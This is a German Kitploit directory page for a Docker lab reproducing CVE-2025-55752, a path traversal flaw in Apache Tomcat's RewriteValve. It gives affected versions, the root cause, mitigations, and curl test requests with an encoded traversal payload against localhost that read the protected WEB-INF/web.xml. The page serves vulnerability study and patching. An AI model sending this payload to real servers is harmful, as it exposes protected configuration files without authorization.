Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/masahiro331/cve-2025-55752
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

# Docker-basierte Reproduktionsumgebung für CVE-2025-55752, eine Path-Traversal-Schwachstelle in Apache Tomcats RewriteValve, die den Normalize-vor-Decode-Fehler demonstriert und Testbefehle bereitstellt.

Repository anzeigen
1433vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55752: Apache Tomcat Path Traversal-Schwachstelle

Docker-basierte Reproduktionsumgebung für CVE-2025-55752, eine Path-Traversal-Schwachstelle in Apache Tomcat 10.1.44.

Überblick

CVE-2025-55752 ist eine Path-Traversal-Schwachstelle im RewriteValve von Apache Tomcat, die durch eine falsche Verarbeitungsreihenfolge verursacht wird: Die URL-Normalisierung erfolgt vor der URL-Dekodierung. Dies ermöglicht Angreifern, Sicherheitsbeschränkungen für Verzeichnisse wie /WEB-INF/ mithilfe von URL-kodierten Path-Traversal-Sequenzen (..%2f) zu umgehen.

Schwachstellenmerkmale

  • CVE-ID: CVE-2025-55752
  • CVSS v3.1: 7.5 (HOCH)
  • CWE: CWE-22 (Path Traversal)
  • Komponente: Apache Tomcat RewriteValve
  • Grundursache: Verarbeitungsreihenfolge Normalisieren-vor-Dekodieren

Betroffene Versionen

SerieVerwundbare VersionenGepatchte Version
11.x11.0.0-M1 bis 11.0.1011.0.11+
10.1.x10.1.0-M1 bis 10.1.4410.1.45+
9.0.x9.0.0-M11 bis 9.0.1089.0.109+
8.5.x8.5.6 bis 8.5.100EOL - Kein Patch

Schnellstart

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

Schwachstellentest

Test 1: Direkter WEB-INF-Zugriff (Geschützt)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

Erwartet: 403 Forbidden

Test 2: Informationsoffenlegung (Geschützte Dateien lesen)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

Erwartet: 200 OK + web.xml-Inhalt (Schwachstelle bestätigt)

Funktionsweise

  1. Anfrage: /download?path=..%2fWEB-INF%2fweb.xml
  2. RewriteValve schreibt um zu: /files/..%2fWEB-INF%2fweb.xml
  3. URL-Normalisierung (vor der Dekodierung): %2f wird nicht als / erkannt, .. bleibt erhalten
  4. URL-Dekodierung: %2f → / → /files/../WEB-INF/web.xml
  5. Pfadauflösung: /WEB-INF/web.xml

Problem der Verarbeitungsreihenfolge

root@kitploit:~
Korrekt:    Dekodieren → Normalisieren → Sicherheitsprüfung
Verwundbar: Normalisieren → Dekodieren → Sicherheitsprüfung ✗

Tomcat-Fix

  • GitHub: apache/tomcat commit 130d36d8
  • Fix: Dekodieren vor dem Normalisieren

Gegenmaßnahmen

  1. RewriteValve deaktivieren, falls nicht erforderlich
  2. PUT-Methode deaktivieren
  3. WAF-Regeln zum Blockieren von ../ und %2e%2e
  4. Upgrade auf gepatchte Versionen (10.1.45+, 9.0.109+, 11.0.11+)

Referenzen

  • Apache Tomcat Security
  • NVD - CVE-2025-55752
  • OWASP Path Traversal
  • CWE-22: Improper Limitation of a Pathname

Haftungsausschluss

⚠️ WARNUNG: Nicht in der Produktion einsetzen. Nur in isolierten Testumgebungen verwenden.

Tool herunterladen